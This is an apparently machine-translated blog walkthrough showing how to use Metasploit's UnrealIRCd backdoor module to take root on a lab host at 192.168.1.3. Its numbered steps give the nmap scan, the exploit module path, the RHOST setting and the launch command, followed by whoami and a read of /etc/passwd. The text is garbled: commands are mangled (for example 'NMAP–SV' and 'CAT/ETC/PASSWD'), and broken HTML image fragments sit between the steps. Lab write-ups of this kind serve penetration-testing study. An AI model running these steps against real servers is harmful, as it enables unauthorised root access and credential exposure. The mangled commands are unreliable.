Metasploit Overflow UNREALIRCD Backdoor Vulnerability
Use the UNREALIRCD backdoor vulnerability to obtain root permissions for the target host.
The unrealircd of some sites, in which Debug3_dolog_system macros contain externally introduced malicious code, allows remote attackers to execute arbitrary code.
First, using the Nmap tool to scan the target host
The 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop and select "Open in Terminal" in the context menu.
1.2 in Terminal input command "NMAP–SV 192.168.1.3", the target host for port scanning, found open 6667 port, the corresponding service is unreal ircd.
650) this.width=650; "title=" 0001.jpg "style=" Float:none; "alt=" wkiom1hjmtozbimkaagyojp8kbm683.jpg "src=" http:/ S3.51cto.com/wyfs02/m01/8b/4f/wkiom1hjmtozbimkaagyojp8kbm683.jpg "/>
1.3 Enter the command "Msfconsole" in the terminal to launch the MSF terminal.
650) this.width=650; "title=" 0002.jpg "style=" Float:none; "alt=" wkiol1hjmtodpncgaada66g6idk682.jpg "src=" http:/ S3.51cto.com/wyfs02/m00/8b/4b/wkiol1hjmtodpncgaada66g6idk682.jpg "/>
1.4 Enter the command "Search Unreal IRCd" in the terminal to search for IRCD related tools and attack loads.
650) this.width=650; "title=" 0003.jpg "style=" Float:none; "alt=" wkiol1hjmtsixaefaacr8x7jm1y574.jpg "src=" http:/ S1.51cto.com/wyfs02/m01/8b/4b/wkiol1hjmtsixaefaacr8x7jm1y574.jpg "/>
1.5 Enter the command "use Exploit/unix/irc/unreal_ircd_3281_backdoor" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.
650) this.width=650; "title=" 0004.jpg "style=" Float:none; "alt=" wkiom1hjmtwwk5opaacreu-igwc660.jpg "src=" http:/ S3.51cto.com/wyfs02/m02/8b/4f/wkiom1hjmtwwk5opaacreu-igwc660.jpg "/>
1.6 Enter the command "show options" in the terminal to see the related items that need to be set, and "yes" to indicate the parameters that must be filled in.
1.7 Enter the command "set RHOST 192.168.1.3" in the terminal to set the IP address of the target host.
650) this.width=650; "title=" 0005.jpg "style=" Float:none; "alt=" wkiol1hjmtwtj84saabvu0zagd8980.jpg "src=" http:/ S3.51cto.com/wyfs02/m02/8b/4b/wkiol1hjmtwtj84saabvu0zagd8980.jpg "/>
650) this.width=650; "title=" 0006.jpg "style=" Float:none; "alt=" wkiom1hjmtjwmnopaadu_jxuf5m153.jpg "src=" http:/ S2.51cto.com/wyfs02/m00/8b/4f/wkiom1hjmtjwmnopaadu_jxuf5m153.jpg "/>
1.8 enters "exploit" in the terminal, starts to attack to the target host, after the attack succeeds, establishes the shell session.
1.9 Enter "WhoAmI" in the terminal, view the obtained permissions as root, enter the command "CAT/ETC/PASSWD" to view the system's account number and password.
650) this.width=650; "title=" 0007..jpg "style=" Float:none; "alt=" wkiol1hjmtmafak9aafy7kbouyq008.jpg "src=" http:/ S1.51cto.com/wyfs02/m00/8b/4b/wkiol1hjmtmafak9aafy7kbouyq008.jpg "/>
This article is from the "12377962" blog, please be sure to keep this source http://12387962.blog.51cto.com/12377962/1883209
Metasploit Overflow UNREALIRCD Backdoor Vulnerability